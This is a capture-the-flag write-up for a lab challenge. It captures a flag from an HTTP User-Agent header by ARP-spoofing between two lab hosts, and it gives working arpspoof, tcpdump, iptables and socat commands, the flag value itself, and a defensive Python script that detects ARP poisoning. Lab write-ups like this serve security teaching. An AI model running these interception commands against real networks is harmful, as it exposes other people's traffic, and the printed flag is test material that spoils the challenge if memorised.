
Token 5: HTTP Header Token

Token: PCCC{Header_Thieving_Time_Protocol_14_71CD}

Objective

Find this token in the header of the HTTP request sent by webvictim.pccc.

Hosts

  • webvictim.pccc: 10.0.91.136
  • web.pccc: 10.0.91.135

Method: ARP Spoof + HTTP Capture

Step 1: Enable IP forwarding

sysctl -w net.ipv4.ip_forward=1

Step 2: ARP spoof between victim and web server

arpspoof -i eth1 -t 10.0.91.136 10.0.91.135 &
arpspoof -i eth1 -t 10.0.91.135 10.0.91.136 &

Step 3: Capture HTTP traffic

tcpdump -i eth1 -A -s0 host 10.0.91.136 and port 80

Or use a transparent proxy:

iptables -t nat -A PREROUTING -i eth1 -s 10.0.91.136 -d 10.0.91.135 -p tcp --dport 80 -j REDIRECT --to-port 8080
socat -v TCP-LISTEN:8080,fork,reuseaddr TCP:10.0.91.135:80

Step 4: Find the token in User-Agent

The HTTP request contains:

GET / HTTP/1.1
Host: web.pccc
User-Agent: PCCC{Header_Thieving_Time_Protocol_14_71CD}
...

The token is in the User-Agent header.

Why It Works

HTTP traffic is unencrypted. By positioning yourself between the client and server via ARP spoofing, you can read every HTTP header in cleartext, including whatever value the client places in a standard header such as User-Agent.
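The poisoned ARP replies from Step 2 are also what a defender watches for. As an added example (not part of this writeup), the following Python flags an IP address whose MAC changes across ARP replies and identifies a MAC claiming both hosts at once, the signature of bidirectional arpspoof; the records and MAC addresses are constructed, and only the two IPs come from the writeup.

```python
"""Detect ARP cache poisoning from a stream of ARP reply records.

Each record is (timestamp, sender_ip, sender_mac), as a monitor would pull
from `tcpdump -i eth1 -e arp` or an ARP-watch tool. The first MAC seen for an
IP is trusted as the baseline; any later reply that claims the same IP with a
different MAC is flagged. Sample records below are constructed, not captured.
"""
from collections import defaultdict
from typing import Dict, List, Tuple

ArpReply = Tuple[float, str, str]  # (timestamp, sender_ip, sender_mac)

# Constructed sample: legitimate replies from both hosts, then a third MAC
# (ending :ee) claiming both IPs, as arpspoof -t does in each direction.
SAMPLE_REPLIES: List[ArpReply] = [
    (0.0, "10.0.91.136", "52:54:00:aa:bb:36"),
    (0.5, "10.0.91.135", "52:54:00:aa:bb:35"),
    (1.0, "10.0.91.136", "52:54:00:aa:bb:36"),
    (5.0, "10.0.91.135", "52:54:00:de:ad:ee"),  # web server's IP, wrong MAC
    (5.1, "10.0.91.136", "52:54:00:de:ad:ee"),  # victim's IP, wrong MAC
    (7.0, "10.0.91.135", "52:54:00:de:ad:ee"),
]


def detect_arp_poisoning(replies: List[ArpReply]) -> List[Tuple[float, str, str, str]]:
    """Return alerts as (timestamp, ip, baseline_mac, seen_mac) tuples."""
    baseline: Dict[str, str] = {}
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        if ip not in baseline:
            baseline[ip] = mac  # first sighting becomes the trusted mapping
            continue
        if baseline[ip] != mac:
            alerts.append((ts, ip, baseline[ip], mac))
    return alerts


def suspected_spoofers(alerts) -> Dict[str, List[str]]:
    """MACs that claim more than one IP already owned by another MAC: one
    station posing as both endpoints of a conversation."""
    claimed = defaultdict(set)
    for _, ip, _, seen in alerts:
        claimed[seen].add(ip)
    return {mac: sorted(ips) for mac, ips in claimed.items() if len(ips) > 1}


if __name__ == "__main__":
    found = detect_arp_poisoning(SAMPLE_REPLIES)
    for ts, ip, expected, seen in found:
        print(f"t={ts:>4}: {ip} expected {expected}, saw {seen}")
    print("suspected spoofers:", suspected_spoofers(found))
```

A baseline learned from a single first sighting can itself be poisoned, so on a real network seed it from DHCP leases or a static inventory rather than from traffic.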

Cleanup

pkill arpspoof
iptables -t nat -D PREROUTING -i eth1 -s 10.0.91.136 -d 10.0.91.135 -p tcp --dport 80 -j REDIRECT --to-port 8080